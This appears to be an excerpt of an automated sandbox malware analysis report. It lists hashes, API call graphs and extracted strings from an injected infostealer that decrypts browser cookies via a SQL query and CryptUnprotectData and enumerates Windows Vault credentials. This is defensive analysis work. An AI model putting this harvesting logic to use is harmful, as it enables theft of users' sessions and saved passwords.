                        • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                        • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                        • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                        • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                        • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                        • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                        • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                        • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                        • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                        • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                        • Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
                        • Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                        • Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                        • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                        • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                        • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                        Execution Graph

                        Execution Coverage:3.7%
                        Dynamic/Decrypted Code Coverage:50.5%
                        Signature Coverage:25.1%
                        Total number of Nodes:786
                        Total number of Limit Nodes:83
                        execution_graph 28128 3016d01 _allmul 27284 3069304 27286 3069344 27284->27286 27285 3069584 27285->27285 27286->27285 27287 30694da LoadLibraryA 27286->27287 27291 306951f VirtualProtect VirtualProtect 27286->27291 27288 30694f1 27287->27288 27288->27286 27290 3069503 GetProcAddress 27288->27290 27290->27288 27292 3069519 27290->27292 27291->27285 28024 3036f06 24 API calls 27368 3004108 27371 3004045 27368->27371 27390 3003fdc 27371->27390 27374 3003fdc 50 API calls 27375 300407a 27374->27375 27376 3003fdc 50 API calls 27375->27376 27377 300408d 27376->27377 27378 3003fdc 50 API calls 27377->27378 27379 30040a0 27378->27379 27380 3003fdc 50 API calls 27379->27380 27381 30040b3 27380->27381 27382 3003fdc 50 API calls 27381->27382 27383 30040c6 27382->27383 27384 3003fdc 50 API calls 27383->27384 27385 30040d9 27384->27385 27386 3003fdc 50 API calls 27385->27386 27387 30040ec 27386->27387 27388 3003fdc 50 API calls 27387->27388 27389 30040ff 27388->27389 27391 3001afe 10 API calls 27390->27391 27392 3003fea 27391->27392 27393 300403f 27392->27393 27394 300199d 9 API calls 27392->27394 27393->27374 27395 3003ff8 27394->27395 27401 3003ed9 27395->27401 27399 3004038 27400 3001011 3 API calls 27399->27400 27400->27393 27402 3003fd1 27401->27402 27403 3003eed 27401->27403 27402->27399 27423 3001d4a 27402->27423 27403->27402 27451 3001000 GetProcessHeap RtlAllocateHeap 27403->27451 27405 3003f01 PathCombineW FindFirstFileW 27406 3003f27 27405->27406 27407 3003fca 27405->27407 27408 3003f32 lstrcmpiW 27406->27408 27409 3003f78 lstrcmpiW 27406->27409 27452 3001000 GetProcessHeap RtlAllocateHeap 27406->27452 27410 3001011 3 API calls 27407->27410 27411 3003faf FindNextFileW 27408->27411 27412 3003f42 lstrcmpiW 27408->27412 27409->27406 27409->27411 27410->27402 27411->27406 27414 3003fc3 FindClose 27411->27414 27412->27411 27415 3003f56 27412->27415 27414->27407 27469 3001000 GetProcessHeap RtlAllocateHeap 27415->27469 27416 3003f92 PathCombineW 
27453 3003e04 27416->27453 27418 3003f60 PathCombineW 27420 3003ed9 23 API calls 27418->27420 27421 3003f76 27420->27421 27422 3001011 3 API calls 27421->27422 27422->27411 27424 3001d62 27423->27424 27425 3001eb4 27423->27425 27424->27425 27496 30019b4 27424->27496 27425->27399 27428 3001d79 27430 3001953 6 API calls 27428->27430 27429 3001d8b 27431 3001953 6 API calls 27429->27431 27432 3001d83 27430->27432 27431->27432 27432->27425 27433 3001da3 FindFirstFileW 27432->27433 27434 3001ead 27433->27434 27440 3001dba 27433->27440 27435 3001011 3 API calls 27434->27435 27435->27425 27436 3001dc5 lstrcmpiW 27438 3001ddd lstrcmpiW 27436->27438 27439 3001e8e FindNextFileW 27436->27439 27437 3001953 6 API calls 27437->27440 27438->27439 27445 3001df5 27438->27445 27439->27440 27441 3001ea2 FindClose 27439->27441 27440->27436 27440->27437 27442 300199d 9 API calls 27440->27442 27441->27434 27444 3001e54 lstrcmpiW 27442->27444 27443 30019b4 lstrlenW 27443->27445 27444->27445 27445->27443 27447 3001011 3 API calls 27445->27447 27448 3001953 6 API calls 27445->27448 27449 300199d 9 API calls 27445->27449 27450 3001d4a 12 API calls 27445->27450 27500 3001cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27445->27500 27447->27439 27448->27445 27449->27445 27450->27445 27451->27405 27452->27416 27454 3001b6a 2 API calls 27453->27454 27455 3003e0f 27454->27455 27466 3003ec7 27455->27466 27470 3001c31 CreateFileW 27455->27470 27462 3003ebf 27463 3001011 3 API calls 27462->27463 27463->27466 27464 3003ea8 27468 3001011 3 API calls 27464->27468 27465 3003e6c RtlCompareMemory 27465->27464 27467 3003e7e CryptUnprotectData 27465->27467 27466->27421 27467->27464 27468->27462 27469->27418 27471 3001c53 GetFileSize 27470->27471 27472 3001c98 27470->27472 27473 3001c90 CloseHandle 27471->27473 27474 3001c63 27471->27474 27472->27466 27481 3002fb1 27472->27481 27473->27472 27493 3001000 GetProcessHeap RtlAllocateHeap 27474->27493 27476 3001c6b ReadFile 27477 3001c80 27476->27477 
27478 3001c87 27476->27478 27477->27473 27477->27478 27479 3001011 3 API calls 27478->27479 27480 3001c8e 27479->27480 27480->27473 27482 3002fb8 StrStrIA 27481->27482 27486 3002ff2 27481->27486 27483 3002fcd lstrlen StrStrIA 27482->27483 27482->27486 27484 3002fe7 27483->27484 27483->27486 27494 300190b 6 API calls 27484->27494 27486->27466 27487 300123b lstrlen 27486->27487 27488 3001256 CryptStringToBinaryA 27487->27488 27489 300129b 27487->27489 27488->27489 27490 3001272 27488->27490 27489->27462 27489->27464 27489->27465 27495 3001000 GetProcessHeap RtlAllocateHeap 27490->27495 27492 300127e CryptStringToBinaryA 27492->27489 27493->27476 27494->27486 27495->27492 27497 30019d4 27496->27497 27498 30019bc 27496->27498 27497->27428 27497->27429 27498->27497 27499 30019c3 lstrlenW 27498->27499 27499->27497 27500->27445 28025 3025f08 102 API calls 27519 3002b15 27520 3001953 6 API calls 27519->27520 27521 3002b1f FindFirstFileW 27520->27521 27523 3002c5c 27521->27523 27531 3002b4e 27521->27531 27524 3001011 3 API calls 27523->27524 27525 3002c63 27524->27525 27527 3001011 3 API calls 27525->27527 27526 3002b59 lstrcmpiW 27528 3002b71 lstrcmpiW 27526->27528 27529 3002c3d FindNextFileW 27526->27529 27530 3002c6a 27527->27530 27528->27529 27528->27531 27529->27531 27532 3002c51 FindClose 27529->27532 27531->27526 27533 30019b4 lstrlenW 27531->27533 27534 300199d 9 API calls 27531->27534 27537 3001953 6 API calls 27531->27537 27542 300199d 9 API calls 27531->27542 27543 3001011 3 API calls 27531->27543 27532->27523 27533->27531 27535 3002bdf StrStrIW 27534->27535 27536 3002c10 StrStrIW 27535->27536 27540 3002bf1 27535->27540 27536->27540 27537->27531 27538 3001cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27538->27540 27539 3001011 3 API calls 27539->27529 27540->27536 27540->27538 27540->27539 27544 300278e 41 API calls 27540->27544 27542->27531 27543->27531 27544->27536 28026 3026b14 memset memcpy _allmul 27545 3003717 27546 3001b6a 2 API calls 
27545->27546 27548 300372e 27546->27548 27547 3003c23 27548->27547 27595 3001000 GetProcessHeap RtlAllocateHeap 27548->27595 27550 300376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27551 30037a8 27550->27551 27552 300379e 27550->27552 27554 3054bec 89 API calls 27551->27554 27596 300349b 31 API calls 27552->27596 27557 30037b3 27554->27557 27555 3003c15 DeleteFileW 27556 3001011 3 API calls 27555->27556 27556->27547 27557->27555 27558 3003c0c 27557->27558 27597 3001000 GetProcessHeap RtlAllocateHeap 27557->27597 27559 3053848 76 API calls 27558->27559 27559->27555 27561 30037e3 27598 30202ec 94 API calls 27561->27598 27563 3003bcc 27603 301fb92 93 API calls 27563->27603 27565 3003bd9 lstrlen 27566 3003c05 27565->27566 27567 3003be5 27565->27567 27568 3001011 3 API calls 27566->27568 27604 3001798 lstrlen 27567->27604 27568->27558 27570 3003833 RtlCompareMemory 27571 3003a37 CryptUnprotectData 27570->27571 27579 30037ee 27570->27579 27571->27579 27573 3003bf3 27605 3001798 lstrlen 27573->27605 27575 3003bfc 27606 3001798 lstrlen 27575->27606 27577 3003867 RtlZeroMemory 27599 3001000 GetProcessHeap RtlAllocateHeap 27577->27599 27579->27563 27579->27570 27579->27571 27579->27577 27580 3001011 3 API calls 27579->27580 27581 3003b0f lstrlen 27579->27581 27583 3001000 GetProcessHeap RtlAllocateHeap 27579->27583 27584 3001fa7 19 API calls 27579->27584 27585 3003987 lstrlen 27579->27585 27589 3003ba3 lstrcat 27579->27589 27600 3002112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27579->27600 27601 3002112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27579->27601 27602 30202ec 94 API calls 27579->27602 27580->27579 27581->27579 27582 3003b21 lstrlen 27581->27582 27582->27579 27583->27579 27584->27579 27585->27579 27587 3003999 lstrlen 27585->27587 27587->27579 27588 3003b66 wsprintfA lstrlen 27588->27579 27588->27589 27589->27579 27591 30039de wsprintfA lstrlen 27592 3003a1b lstrcat 27591->27592 27593 3003a0d 
27591->27593 27594 3001011 3 API calls 27592->27594 27593->27592 27594->27579 27595->27550 27596->27551 27597->27561 27598->27579 27599->27579 27600->27591 27601->27588 27602->27579 27603->27565 27604->27573 27605->27575 27606->27566 27655 300411b 27656 3004045 50 API calls 27655->27656 27657 300412b 27656->27657 27658 3004045 50 API calls 27657->27658 27659 300413b 27658->27659 28133 30184a7 30 API calls 28134 3009925 18 API calls 28030 304c322 27 API calls 28136 3010128 36 API calls 28032 300cb2a _allmul _allmul 28033 303072d 19 API calls 28139 302f130 22 API calls 28034 301ff32 21 API calls 28140 3019534 39 API calls 28037 3017b3d 18 API calls 28019 300413e 28020 3004045 50 API calls 28019->28020 28021 300414e 28020->28021 28039 3010f3e 60 API calls 28040 3026340 92 API calls 28141 302e141 18 API calls 28042 301f74d 18 API calls 28143 300a558 18 API calls 28144 302e558 22 API calls 28045 3037762 memset memset memcpy 28047 3027f67 24 API calls 28048 300ab68 22 API calls 28146 3035d6f 20 API calls 28147 301a16f 33 API calls 27954 3002f77 27955 3002e30 22 API calls 27954->27955 27956 3002f9a 27955->27956 27957 3002e30 22 API calls 27956->27957 27958 3002fab 27957->27958 28150 301c97b memcpy 28151 3027d8b _allrem memcpy 28053 301ab8b 19 API calls 28054 301cb91 18 API calls 28153 301fd97 19 API calls 28055 30213ca 88 API calls 28154 3001198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28057 300bf9a _alldiv 27660 3001b9d 27661 3001bc1 27660->27661 27662 3001ba2 27660->27662 27662->27661 27663 3001ba9 GetFileAttributesW 27662->27663 27664 3001bb5 27663->27664 27747 300639e 27751 300b1e3 27747->27751 27771 300b1e5 27747->27771 27748 30063b2 27752 300b1e5 27751->27752 27753 300b214 27752->27753 27807 300aeea 27752->27807 27755 300b233 27753->27755 27770 300b28f 27753->27770 27825 300ae65 27753->27825 27755->27770 27791 300a7ae 27755->27791 27758 300b26d 27831 300a1c6 18 API calls 27758->27831 27759 300b2d6 27804 3006a5a 27759->27804 27762 
300b2e8 27766 300b310 CreateFileMappingW 27762->27766 27762->27770 27767 300b32b MapViewOfFile 27766->27767 27768 300b37e 27766->27768 27767->27762 27767->27768 27832 300a1c6 18 API calls 27768->27832 27770->27748 27772 300b214 27771->27772 27773 300b20d 27771->27773 27775 300b233 27772->27775 27776 300ae65 22 API calls 27772->27776 27778 300b28f 27772->27778 27774 300aeea 27 API calls 27773->27774 27774->27772 27777 300a7ae 18 API calls 27775->27777 27775->27778 27776->27775 27781 300b267 27777->27781 27778->27748 27779 300b26d 27869 300a1c6 18 API calls 27779->27869 27780 300b2d6 27782 3006a5a 17 API calls 27780->27782 27781->27778 27781->27779 27781->27780 27783 300a67c 22 API calls 27781->27783 27789 300b2e8 27782->27789 27785 300b2be 27783->27785 27785->27779 27785->27780 27786 300b310 CreateFileMappingW 27787 300b32b MapViewOfFile 27786->27787 27788 300b37e 27786->27788 27787->27788 27787->27789 27870 300a1c6 18 API calls 27788->27870 27789->27778 27789->27786 27793 300a7c7 27791->27793 27792 300a805 27792->27758 27792->27759 27792->27770 27795 300a67c 27792->27795 27793->27792 27833 300a1c6 18 API calls 27793->27833 27796 300a6c1 27795->27796 27797 300a694 _alldiv _allmul 27795->27797 27834 300a33b SetFilePointer 27796->27834 27797->27796 27800 300a6f0 SetEndOfFile 27801 300a6d4 27800->27801 27802 300a6ee 27800->27802 27801->27802 27838 300a1c6 18 API calls 27801->27838 27802->27758 27802->27759 27805 305307c 17 API calls 27804->27805 27806 3006a65 27805->27806 27806->27762 27808 3006a81 memset 27807->27808 27809 300af01 27808->27809 27810 3006a81 memset 27809->27810 27824 300af07 27809->27824 27811 300af2a 27810->27811 27811->27824 27840 3007f07 27811->27840 27813 30552ae _allmul 27815 300afd9 27813->27815 27814 300af54 27814->27813 27814->27824 27816 300b87b 21 API calls 27815->27816 27817 300affa 27816->27817 27818 300b020 27817->27818 27819 300b000 27817->27819 27820 300ae65 22 API calls 27818->27820 27848 300a1c6 18 API calls 27819->27848 27822 300b01c 
27820->27822 27822->27824 27843 300adcc 27822->27843 27824->27753 27827 300ae7a 27825->27827 27826 300ae83 27826->27755 27827->27826 27828 300a67c 22 API calls 27827->27828 27829 300aea5 27828->27829 27829->27826 27868 300a1c6 18 API calls 27829->27868 27831->27770 27832->27770 27833->27792 27835 300a36a 27834->27835 27837 300a390 27834->27837 27835->27837 27839 300a1c6 18 API calls 27835->27839 27837->27800 27837->27801 27838->27802 27839->27837 27849 3007ec7 27840->27849 27847 300ade4 27843->27847 27844 300ae5f 27844->27824 27847->27844 27854 300bafc 27847->27854 27865 300a39e 18 API calls 27847->27865 27848->27822 27850 3007ed4 27849->27850 27851 3007ed9 27849->27851 27850->27814 27853 3006e6a 17 API calls 27851->27853 27853->27850 27855 300b609 memset 27854->27855 27860 300bb14 27855->27860 27856 300bb3f GetFileAttributesW 27857 300bb4b 27856->27857 27856->27860 27859 300bb5b 27857->27859 27861 300bb7d 27857->27861 27858 300bb25 DeleteFileW 27858->27860 27858->27861 27866 300a1c6 18 API calls 27859->27866 27860->27856 27860->27858 27860->27859 27864 300bb1a 27860->27864 27867 300a2aa 17 API calls 27861->27867 27864->27847 27865->27847 27866->27864 27867->27864 27868->27826 27869->27778 27870->27778 28156 30111a0 43 API calls 28058 3028ba6 7 API calls 28059 30453ad memset memcpy memset memcpy 28060 30433b7 27 API calls 28061 30213ca 89 API calls 28158 3029dbc 25 API calls 28062 30373c4 22 API calls 27361 3009fc8 27363 3009fd3 27361->27363 27365 3009fd8 27361->27365 27362 3009ff4 HeapCreate 27362->27363 27364 300a004 27362->27364 27367 3007f70 17 API calls 27364->27367 27365->27362 27365->27363 27367->27363 28065 30213ca 89 API calls 28159 3053dc8 24 API calls 27636 30043d9 27643 3004317 _alloca_probe RegOpenKeyW 27636->27643 27639 3004317 25 API calls 27640 30043f5 27639->27640 27641 3004317 25 API calls 27640->27641 27642 3004403 27641->27642 27644 3004343 RegEnumKeyExW 27643->27644 27645 30043cf 27643->27645 27646 30043c4 RegCloseKey 27644->27646 27650 300436d 
27644->27650 27645->27639 27646->27645 27647 3001953 6 API calls 27647->27650 27648 300199d 9 API calls 27648->27650 27650->27647 27650->27648 27651 3001011 3 API calls 27650->27651 27654 300418a 16 API calls 27650->27654 27652 300439b RegEnumKeyExW 27651->27652 27652->27650 27653 30043c3 27652->27653 27653->27646 27654->27650 28068 300ebd9 37 API calls 27665 30063dd 27668 300b87b 27665->27668 27666 30063f4 27669 300b88d memset 27668->27669 27676 300b8e5 27669->27676 27672 300ba3c 27672->27666 27673 300b965 CreateFileW 27673->27676 27676->27669 27676->27672 27676->27673 27677 300ba14 27676->27677 27679 300ba41 27676->27679 27683 300b609 27676->27683 27686 300b64b 18 API calls 27676->27686 27687 300bb9f 18 API calls 27676->27687 27688 300a2aa 17 API calls 27676->27688 27689 300a1c6 18 API calls 27677->27689 27691 30552ae 27679->27691 27680 300ba32 27690 3054db2 17 API calls 27680->27690 27695 300a08a 27683->27695 27685 300b60f 27685->27676 27686->27676 27687->27676 27688->27676 27689->27680 27690->27672 27692 30552bb 27691->27692 27693 30552d1 27692->27693 27703 303ba08 _allmul 27692->27703 27693->27672 27696 300a0a4 27695->27696 27698 300a0aa 27696->27698 27699 3006a81 27696->27699 27698->27685 27700 3006a8f 27699->27700 27701 3006aa4 27700->27701 27702 3006a95 memset 27700->27702 27701->27698 27702->27701 27703->27693 27704 30015dd 27705 3001600 27704->27705 27706 30015f3 lstrlen 27704->27706 27715 3001000 GetProcessHeap RtlAllocateHeap 27705->27715 27706->27705 27708 3001608 lstrcat 27709 3001644 27708->27709 27710 300163d lstrcat 27708->27710 27716 3001333 27709->27716 27710->27709 27713 3001011 3 API calls 27714 3001667 27713->27714 27715->27708 27739 3001000 GetProcessHeap RtlAllocateHeap 27716->27739 27718 3001357 27740 300106c lstrlen MultiByteToWideChar 27718->27740 27720 3001366 27741 30012a3 RtlZeroMemory 27720->27741 27723 30013b8 RtlZeroMemory 27727 30013ed 27723->27727 27724 3001011 3 API calls 27725 30015d2 27724->27725 27725->27713 27726 30015b5 
27726->27724 27727->27726 27743 3001000 GetProcessHeap RtlAllocateHeap 27727->27743 27729 30014a7 wsprintfW 27731 30014c9 27729->27731 27730 30015a1 27732 3001011 3 API calls 27730->27732 27731->27730 27744 3001000 GetProcessHeap RtlAllocateHeap 27731->27744 27732->27726 27734 3001533 27735 300159a 27734->27735 27745 300104c VirtualAlloc 27734->27745 27737 3001011 3 API calls 27735->27737 27737->27730 27738 300158a RtlMoveMemory 27738->27735 27739->27718 27740->27720 27742 30012c5 27741->27742 27742->27723 27742->27726 27743->27729 27744->27734 27745->27738 28162 30099e1 strncmp 28163 300c9ea _allmul _alldiv 28165 30555eb IsProcessorFeaturePresent 28070 30213ca 72 API calls 28071 3019ff0 32 API calls 28167 30049f1 13 API calls 28168 300d1f7 memset _allmul _allmul 28003 30047fa 28010 300479c 28003->28010 28006 300479c 23 API calls 28007 3004813 28006->28007 28008 300479c 23 API calls 28007->28008 28009 300481f 28008->28009 28011 3001afe 10 API calls 28010->28011 28012 30047af 28011->28012 28013 30047f1 28012->28013 28014 300199d 9 API calls 28012->28014 28013->28006 28016 30047bf 28014->28016 28015 30047ea 28017 3001011 3 API calls 28015->28017 28016->28015 28018 3001d4a 18 API calls 28016->28018 28017->28013 28018->28016 28074 300ca01 _allmul _alldiv _allmul _alldiv 28169 3039000 28 API calls 28172 3045401 memset memcpy memcpy memset memcpy 27293 3004406 27298 3002e30 StrStrIW 27293->27298 27296 3002e30 22 API calls 27297 300443a 27296->27297 27299 3002e57 27298->27299 27300 3002ebc 27298->27300 27335 30019e5 27299->27335 27324 3001000 GetProcessHeap RtlAllocateHeap 27300->27324 27303 3002ed0 RegOpenKeyExW 27305 3002f68 27303->27305 27315 3002eee 27303->27315 27307 3001011 3 API calls 27305->27307 27306 3002f50 RegEnumKeyExW 27310 3002f5e RegCloseKey 27306->27310 27306->27315 27311 3002f6f 27307->27311 27309 3002e75 27312 3002eb5 27309->27312 27350 3001afe 27309->27350 27310->27305 27311->27296 27316 3001011 3 API calls 27312->27316 27315->27306 27320 3002e30 18 

                        Control-flow Graph
                        (graph rendering not reproduced; legend: Executed / Not Executed)
                        APIs
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 03003778
                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03003782
                        • DeleteFileW.KERNELBASE(00000000), ref: 03003789
                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03003794
                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0300383B
                        • RtlZeroMemory.NTDLL(?,00000040), ref: 03003870
                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 0300398B
                        • lstrlen.KERNEL32(00000000), ref: 0300399A
                        • wsprintfA.USER32 ref: 030039F1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 030039FD
                        • lstrcat.KERNEL32(00000000,?), ref: 03003A21
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03003A49
                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03003B13
                        • lstrlen.KERNEL32(00000000), ref: 03003B22
                        • wsprintfA.USER32 ref: 03003B79
                        • lstrlen.KERNEL32(00000000), ref: 03003B85
                        • lstrcat.KERNEL32(00000000,?), ref: 03003BA9
                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 03003BDA
                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03003C16
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$ChangeCloseCompareCopyCreateCryptDataFindNameNotificationPathUnprotectZero
                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                        • API String ID: 2397694182-404540950
                        • Opcode ID: 26e5fb0d9f8342b1feabf890af0d9453c18ef0970d264df87ac776aebbdca7fd
                        • Instruction ID: 937483fc304289242fb9ed29507eb4f4059ed4f23658ffa57fc497547346718d
                        • Opcode Fuzzy Hash: 26e5fb0d9f8342b1feabf890af0d9453c18ef0970d264df87ac776aebbdca7fd
                        • Instruction Fuzzy Hash: E5E1BE7920A341AFE716EF24C844B7FBBE9AFC5344F48496CF5859A290DB75C804CB52

                        Control-flow Graph
                        (graph rendering not reproduced; legend: Executed / Not Executed)
                        APIs
                        • RtlZeroMemory.NTDLL(?,00000114), ref: 030021AF
                        • GetVersionExW.KERNEL32(?), ref: 030021BE
                        • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 030021E8
                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0300220A
                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 03002214
                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 03002220
                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0300222A
                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 03002236
                        • RtlCompareMemory.NTDLL(?,03061110,00000010), ref: 030022E8
                        • RtlCompareMemory.NTDLL(?,03061110,00000010), ref: 0300236C
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 030023FE
                        • FreeLibrary.KERNELBASE(00000000), ref: 03002493
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                        • API String ID: 2583887280-2831467701
                        • Opcode ID: cd8d610a362cfab2703b9c3b8300d38af94920e596ce32489995325f5ce6e731
                        • Instruction ID: a77e333eb75de8115b4b9fd82eb52852483cba261e5dd42e1526723065187bee
                        • Opcode Fuzzy Hash: cd8d610a362cfab2703b9c3b8300d38af94920e596ce32489995325f5ce6e731
                        • Instruction Fuzzy Hash: 2E91AF75A0A304AFE718DF65C848A6FBBE9BFC8304F44482DF9959B291DB71D801CB42

                        Control-flow Graph
                        (graph rendering not reproduced; legend: Executed / Not Executed)
                        APIs
